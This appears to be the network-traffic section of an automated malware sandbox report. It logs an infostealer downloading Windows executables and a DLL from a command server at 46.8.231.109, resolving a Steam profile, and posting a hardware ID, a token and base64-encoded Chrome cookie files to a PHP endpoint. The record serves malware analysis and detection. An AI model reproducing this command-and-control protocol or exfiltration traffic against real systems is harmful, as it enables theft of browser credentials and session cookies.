Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 26 Sep 2024 22:16:19 GMTContent-Type: application/octet-streamContent-Length: 385064Last-Modified: Thu, 26 Sep 2024 22:09:48 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66f5dbac-5e028"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 24 db f5 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 b0 05 00 00 08 00 00 00 00 00 00 3e ce 05 00 00 20 00 00 00 e0 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 06 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e8 cd 05 00 53 00 00 00 00 e0 05 00 c8 05 00 00 00 00 00 00 00 00 00 00 00 ba 05 00 28 26 00 00 00 00 06 00 0c 00 00 00 b0 cc 05 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 44 ae 05 00 00 20 00 00 00 b0 05 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 c8 05 00 00 00 e0 05 00 00 06 00 00 00 b2 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 06 00 00 02 00 00 00 b8 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 ce 05 00 00 00 00 00 48 00 00 00 02 00 05 00 80 bc 05 00 30 10 00 00 03 00 02 00 12 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ad 79 1c 59 59 6c 14 76 5e 87 dc f4 35 66 85 48 24 b2 ce 02 9f f7 2f fa 57 cb 61 b6 7a 7a f0 df 35 4f 10 9b 37 1c cd 12 66 9e 17 53 d5 6c 5c f1 52 42 af 6b 08 35 e6 ea 8e 7f 45 71 7f 85 08 89 95 76 f5 df 0e a5 d6 fc 42 00 1a 12 66 8a 8c a2 0d cc d6 dd fd 9a b7 bc c6 39 76 02 fa f3 3b 28 cc 46 d9 81 20 0a 4a 2a b2 67 cc 69 96 ae 28 1e d1 d6 18 42 b3 42 cb 4d 9a 73 8f a0 c3 3c 0d c8 75 62 e5 20 1b 6c f5 5d b3 87 96 ab bd 51 67 83 b4 d5 5c c3 42 63 2a 84 b1 06 91 e4 24 95 19 a0 1f c7 f8 aa f8 66 56 47 5a 94 db 00 2e f4 cb 98 c5 a0 c0 c1 38 d1 da 99 e2 a3 9c 0e 6c 48 3b 21 f8 0a 17 22 ae e3 f0 fb 82 f0 70 98 55 4f 04 38 d7 59 22 c7 e2 fb f1 64 f2 d1 be 5c eb 0e a2 64 44 22 b3 73 6d 7d cb 63 23 15 3f e1 34 3f 13 f1 59 23 dc 04 b7 a4 e3 17 cb 30 bb 1b 1d ff 56 53 cd bd 1d 58 bb 10 7c 89 e7 0c c4 9d 47 16 2e cb 67 ac 3a 21 72 4d 5b 7e 1b 01 94 65 bf 42 70 d5 e0 62 7a a7 7b 84 1c 13 a4 60 35 1d cc f3 7
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 26 Sep 2024 22:16:21 GMTContent-Type: application/octet-streamContent-Length: 413224Last-Modified: Thu, 26 Sep 2024 22:09:34 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66f5db9e-64e28"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 ed da f5 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 1e 06 00 00 08 00 00 00 00 00 00 3e 3c 06 00 00 20 00 00 00 40 06 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 06 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e8 3b 06 00 53 00 00 00 00 40 06 00 c8 05 00 00 00 00 00 00 00 00 00 00 00 28 06 00 28 26 00 00 00 60 06 00 0c 00 00 00 b0 3a 06 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 44 1c 06 00 00 20 00 00 00 1e 06 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 c8 05 00 00 00 40 06 00 00 06 00 00 00 20 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 06 00 00 02 00 00 00 26 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 3c 06 00 00 00 00 00 48 00 00 00 02 00 05 00 80 2a 06 00 30 10 00 00 03 00 02 00 12 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fa 88 91 bf 5e 83 38 3d 2e 1f 51 05 cf 88 76 20 41 c7 95 33 5b 52 f9 4a 2a f9 82 5f c1 c3 ff 82 66 8e 1a 39 be 5c 6c 9b f9 76 43 23 53 73 6e 42 7e af 45 c2 d5 7e e6 69 03 87 37 0a 7d 2b f1 56 fc 0f ec 23 c9 db 38 17 bf 66 d1 23 58 57 9c b5 06 ce 62 88 e7 bd 91 11 28 94 81 83 aa 92 c9 c2 8e d2 87 dd ec a8 98 87 c8 07 8b 3c 4f b6 ac bf ed bf 07 19 c0 31 1b 24 cc 3d 55 4e 38 dd 29 a8 19 4c 4c 7f 0c af ed 28 4b fe 03 12 d6 b5 2c 72 c8 ca d7 b3 ae c5 9b 25 39 15 4c 9f 59 0e 3d 30 c4 b5 89 54 34 83 26 8a bd 1f 9d 1e 64 ee d4 ba 2e 0a 28 55 17 81 d3 ce 92 27 3d 22 80 85 94 28 3e e0 64 98 7f 2b f2 0c 39 32 a5 1a ac 70 38 c5 31 9a 90 50 61 5c 71 b7 ee e5 d8 af 5d 58 96 2f 61 fc 40 30 43 ff 50 51 8c b9 d4 42 fc 07 ed 76 89 17 36 04 04 f7 d0 6c 65 32 07 b1 95 85 34 49 33 02 b4 02 02 ce d3 d2 50 a3 43 3a 11 09 b2 76 98 7d 89 51 c9 77 70 11 89 53 28 41 ec 51 67 16 27 16 0b 4e 09 04 5f 58 f5 6d 76 67 ba 1c d
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 26 Sep 2024 22:16:23 GMTContent-Type: application/octet-streamContent-Length: 73216Last-Modified: Thu, 26 Sep 2024 22:01:15 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66f5d9ab-11e00"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 b5 0f 16 c8 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 30 00 00 04 01 00 00 18 00 00 00 00 00 00 0e 22 01 00 00 20 00 00 00 40 01 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 01 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 b8 21 01 00 53 00 00 00 00 40 01 00 17 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 01 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 14 02 01 00 00 20 00 00 00 04 01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 17 14 00 00 00 40 01 00 00 16 00 00 00 06 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 01 00 00 02 00 00 00 1c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 21 01 00 00 00 00 00 48 00 00 00 02 00 05 00 74 fc 00 00 44 25 00 00 03 00 02 00 06 00 00 06 80 2c 00 00 f4 cf 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 28 22 00 00 06 2a 1e 02 28 1a 00 00 0a 2a 36 02 7c 07 00 00 04 03 28 30 00 00 0a 2a 56 73 31 00 00 0a 72 fe 01 00 70 28 02 00 00 06 28 32 00 00 0a 2a 4a 73 31 00 00 0a 02 73 33 00 00 0a 03 28 34 00 00 0a 2a 5a 72 a6 02 00 70 28 02 00 00 06 28 11 00 00 06 02 6f 45 00 00 0a 2a b2 02 28 4e 00 00 0a 3a 01 00 00 00 2a 72 0c 03 00 70 28 02 00 00 06 02 72 26 03 00 70 28 02 00 00 06 28 4f 00 00 0a 28 10 00 00 06 2a e6 72 a6 03 00 70 28 02 00 00 06 28 11 00 00 06 72 d8 03 00 70 28 02 00 00 06 6f 45 00 00 0a 3a 0b 00 00 00 72 0a 04 00 70 28 02 00 00 06 2a 72 d8 03 00 70 28 02 00 00 06 2a aa 72 4d 06 00 70 28 02 00 00 06 02 7b 0a 00 00 04 72 4d 06 00 70 28 02 00 00 06 28 52 00 00 0a 6f 53 00 00 0a 28 54 00 00 0a 2a 62 02 3a 0b 00 00 00 72 00 07 00 70 28 02 00 00 06 2a 02 6f 55 00 00 0a 2a 13 30 04 00 6e 00 00 00 01 00 00 11 00 02 28 0a 00 00 0a 0a 73 0b 00 00 0a 28 0c 00 00 0a 72 01 00 00 70 6f 0d 00 00

Source: global traffic	HTTP traffic detected: POST /receive.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: hansgborn.euContent-Length: 58Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /profiles/76561199780418869 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /profiles/76561199780418869 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 46.8.231.109Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KFHCAEGCBFHJDGCBFHDAHost: 46.8.231.109Content-Length: 213Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 46 48 43 41 45 47 43 42 46 48 4a 44 47 43 42 46 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 38 39 37 46 37 44 42 41 32 31 38 31 39 34 33 30 31 37 39 32 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 48 43 41 45 47 43 42 46 48 4a 44 47 43 42 46 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 48 43 41 45 47 43 42 46 48 4a 44 47 43 42 46 48 44 41 2d 2d 0d 0a Data Ascii: ------KFHCAEGCBFHJDGCBFHDAContent-Disposition: form-data; name="hwid"A897F7DBA218194301792------KFHCAEGCBFHJDGCBFHDAContent-Disposition: form-data; name="build"default------KFHCAEGCBFHJDGCBFHDA--
Source: global traffic	HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IIIDAKJDHJKFHIEBFCGHHost: 46.8.231.109Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 49 49 44 41 4b 4a 44 48 4a 4b 46 48 49 45 42 46 43 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 36 31 61 33 30 66 66 38 63 61 39 33 30 34 66 33 30 32 33 34 61 33 65 32 38 39 37 32 38 63 65 35 62 39 64 66 30 33 61 63 35 38 66 33 64 62 37 63 64 36 37 38 37 36 35 34 35 35 34 65 62 66 61 61 32 30 34 62 32 34 34 0d 0a 2d 2d 2d 2d 2d 2d 49 49 49 44 41 4b 4a 44 48 4a 4b 46 48 49 45 42 46 43 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 49 49 49 44 41 4b 4a 44 48 4a 4b 46 48 49 45 42 46 43 47 48 2d 2d 0d 0a Data Ascii: ------IIIDAKJDHJKFHIEBFCGHContent-Disposition: form-data; name="token"061a30ff8ca9304f30234a3e289728ce5b9df03ac58f3db7cd6787654554ebfaa204b244------IIIDAKJDHJKFHIEBFCGHContent-Disposition: form-data; name="message"browsers------IIIDAKJDHJKFHIEBFCGH--
Source: global traffic	HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CGHCGIIDGDAKFIEBKFCFHost: 46.8.231.109Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 47 48 43 47 49 49 44 47 44 41 4b 46 49 45 42 4b 46 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 36 31 61 33 30 66 66 38 63 61 39 33 30 34 66 33 30 32 33 34 61 33 65 32 38 39 37 32 38 63 65 35 62 39 64 66 30 33 61 63 35 38 66 33 64 62 37 63 64 36 37 38 37 36 35 34 35 35 34 65 62 66 61 61 32 30 34 62 32 34 34 0d 0a 2d 2d 2d 2d 2d 2d 43 47 48 43 47 49 49 44 47 44 41 4b 46 49 45 42 4b 46 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 43 47 48 43 47 49 49 44 47 44 41 4b 46 49 45 42 4b 46 43 46 2d 2d 0d 0a Data Ascii: ------CGHCGIIDGDAKFIEBKFCFContent-Disposition: form-data; name="token"061a30ff8ca9304f30234a3e289728ce5b9df03ac58f3db7cd6787654554ebfaa204b244------CGHCGIIDGDAKFIEBKFCFContent-Disposition: form-data; name="message"plugins------CGHCGIIDGDAKFIEBKFCF--
Source: global traffic	HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AFHDHCAAKECFIDHIEBAKHost: 46.8.231.109Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 46 48 44 48 43 41 41 4b 45 43 46 49 44 48 49 45 42 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 36 31 61 33 30 66 66 38 63 61 39 33 30 34 66 33 30 32 33 34 61 33 65 32 38 39 37 32 38 63 65 35 62 39 64 66 30 33 61 63 35 38 66 33 64 62 37 63 64 36 37 38 37 36 35 34 35 35 34 65 62 66 61 61 32 30 34 62 32 34 34 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 44 48 43 41 41 4b 45 43 46 49 44 48 49 45 42 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 44 48 43 41 41 4b 45 43 46 49 44 48 49 45 42 41 4b 2d 2d 0d 0a Data Ascii: ------AFHDHCAAKECFIDHIEBAKContent-Disposition: form-data; name="token"061a30ff8ca9304f30234a3e289728ce5b9df03ac58f3db7cd6787654554ebfaa204b244------AFHDHCAAKECFIDHIEBAKContent-Disposition: form-data; name="message"fplugins------AFHDHCAAKECFIDHIEBAK--
Source: global traffic	HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECBGIEHDBAAFIDGDAAAAHost: 46.8.231.109Content-Length: 7107Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /1309cdeb8f4c8736/sqlite3.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JDHIEBFHCAKEHIDGHCBAHost: 46.8.231.109Content-Length: 751Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 44 48 49 45 42 46 48 43 41 4b 45 48 49 44 47 48 43 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 36 31 61 33 30 66 66 38 63 61 39 33 30 34 66 33 30 32 33 34 61 33 65 32 38 39 37 32 38 63 65 35 62 39 64 66 30 33 61 63 35 38 66 33 64 62 37 63 64 36 37 38 37 36 35 34 35 35 34 65 62 66 61 61 32 30 34 62 32 34 34 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 48 49 45 42 46 48 43 41 4b 45 48 49 44 47 48 43 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 48 49 45 42 46 48 43 41 4b 45 48 49 44 47 48 43 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 56 46 4a 56 52 51 6b 76 43 55 5a 42 54 46 4e 46 43 54 45 32 4f 54 6b 77 4d 54 45 32 4d 54 55 4a 4d 56 42 66 53 6b 46 53 43 54 49 77 4d 6a 4d 74 4d 54 41 74 4d 44 51 74 4d 54 4d 4b 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 52 6b 46 4d 55 30 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 7a 45 79 4d 6a 4d 77 4f 44 45 31 43 55 35 4a 52 41 6b 31 4d 54 45 39 52 57 59 31 64 6c 42 47 52 33 63 74 54 56 70 5a 62 7a 56 6f 64 32 55 74 4d 46 52 6f 51 56 5a 7a 62 47 4a 34 59 6d 31 32 5a 46 5a 61 64 32 4e 49 62 6e 46 57 65 6c 64 49 51 56 55 78 4e 48 59 31 4d 30 31 4f 4d 56 5a 32 64 33 5a 52 63 54 68 69 59 56 6c 6d 5a 7a 49 74 53 55 46 30 63 56 70 43 56 6a 56 4f 54 30 77 31 63 6e 5a 71 4d 6b 35 58 53 58 46 79 65 6a 4d 33 4e 31 56 6f 54 47 52 49 64 45 39 6e 52 53 31 30 53 6d 46 43 62 46 56 43 57 55 70 46 61 48 56 48 63 31 46 6b 63 57 35 70 4d 32 39 55 53 6d 63 77 59 6e 4a 78 64 6a 46 6b 61 6d 52 70 54 45 70 35 64 6c 52 54 56 57 68 6b 53 79 31 6a 4e 55 70 58 59 57 52 44 55 33 4e 56 54 46 42 4d 65 6d 68 54 65 43 31 47 4c 54 5a 33 54 32 63 30 43 67 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 48 49 45 42 46 48 43 41 4b 45 48 49 44 47 48 43 42 41 2d 2d 0d 0a Data Ascii: ------JDHIEBFHCAKEHIDGHCBAContent-Disposition: form-data; name="token"061a30ff8ca9304f30234a3e289728ce5b9df03ac58f3db7cd6787654554ebfaa204b244------JDHIEBFHCAKEHIDGHCBAContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------JDHIEBFHCAKEHIDGHCBAContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JVFJVRQkvCUZBTFNFCTE2OTkwMTE2MTUJMVBfSkFSCTIwMjMtMTAtMDQtMTMKLmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjMwODE1CU5JRAk1MTE9RWY1dlBGR3ctTVpZbzVod2UtMFRoQVZzbGJ4Ym1
Source: global traffic	HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GCAEHDBAAECBFHJKFCFBHost: 46.8.231.109Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 43 41 45 48 44 42 41 41 45 43 42 46 48 4a 4b 46 43 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 36 31 61 33 30 66 66 38 63 61 39 33 30 34 66 33 30 32 33 34 61 33 65 32 38 39 37 32 38 63 65 35 62 39 64 66 30 33 61 63 35 38 66 33 64 62 37 63 64 36 37 38 37 36 35 34 35 35 34 65 62 66 61 61 32 30 34 62 32 34 34 0d 0a 2d 2d 2d 2d 2d 2d 47 43 41 45 48 44 42 41 41 45 43 42 46 48 4a 4b 46 43 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 47 43 41 45 48 44 42 41 41 45 43 42 46 48 4a 4b 46 43 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 47 43 41 45 48 44 42 41 41 45 43 42 46 48 4a 4b 46 43 46 42 2d 2d 0d 0a Data Ascii: ------GCAEHDBAAECBFHJKFCFBContent-Disposition: form-data; name="token"061a30ff8ca9304f30234a3e289728ce5b9df03ac58f3db7cd6787654554ebfaa204b244------GCAEHDBAAECBFHJKFCFBContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------GCAEHDBAAECBFHJKFCFBContent-Disposition: form-data; name="file"------GCAEHDBAAECBFHJKFCFB--
Source: global traffic	HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JKEHIIJJECFHJKECFHDGHost: 46.8.231.109Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4b 45 48 49 49 4a 4a 45 43 46 48 4a 4b 45 43 46 48 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 36 31 61 33 30 66 66 38 63 61 39 33 30 34 66 33 30 32 33 34 61 33 65 32 38 39 37 32 38 63 65 35 62 39 64 66 30 33 61 63 35 38 66 33 64 62 37 63 64 36 37 38 37 36 35 34 35 35 34 65 62 66 61 61 32 30 34 62 32 34 34 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 48 49 49 4a 4a 45 43 46 48 4a 4b 45 43 46 48 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 48 49 49 4a 4a 45 43 46 48 4a 4b 45 43 46 48 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 48 49 49 4a 4a 45 43 46 48 4a 4b 45 43 46 48 44 47 2d 2d 0d 0a Data Ascii: ------JKEHIIJJECFHJKECFHDGContent-Disposition: form-data; name="token"061a30ff8ca9304f30234a3e289728ce5b9df03ac58f3db7cd6787654554ebfaa204b244------JKEHIIJJECFHJKECFHDGContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------JKEHIIJJECFHJKECFHDGContent-Disposition: form-data; name="file"------JKEHIIJJECFHJKECFHDG--
